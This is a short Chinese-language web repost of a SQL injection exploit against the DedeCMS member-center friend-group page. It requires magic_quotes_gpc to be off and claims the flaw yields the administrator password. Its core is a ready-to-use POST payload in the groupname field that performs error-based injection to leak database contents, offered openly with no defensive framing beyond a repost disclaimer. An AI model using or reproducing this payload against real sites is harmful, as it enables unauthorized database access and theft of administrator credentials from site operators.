DedeCMS会员中心好友分组设置SQL注射0day漏洞 - 网站

需要magic_quotes_gpc = Off

DedeCMS会员中心好友分组设置SQL注射0day 漏洞 ,成功利用该漏洞可获得管理员密码

都发出来吧,这种东西也算什么漏洞阿.其实对dedecms来说POST的数据同样可以GET提交,只是隐蔽点.

利用代码如下:

Exploit:

http://www.2cto.com /de/member/myfriend_group.php?dopost=add

POST

groupname=fffrrr'and @`'` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((Select (version())),1,62)))a from information_schema.tables group by a)b) and '

声明：本文来自网络，不代表【好得很程序员自学网】立场，转载请注明出处：http://haodehen.cn/did14456

更新时间：2022-09-13 阅读：48次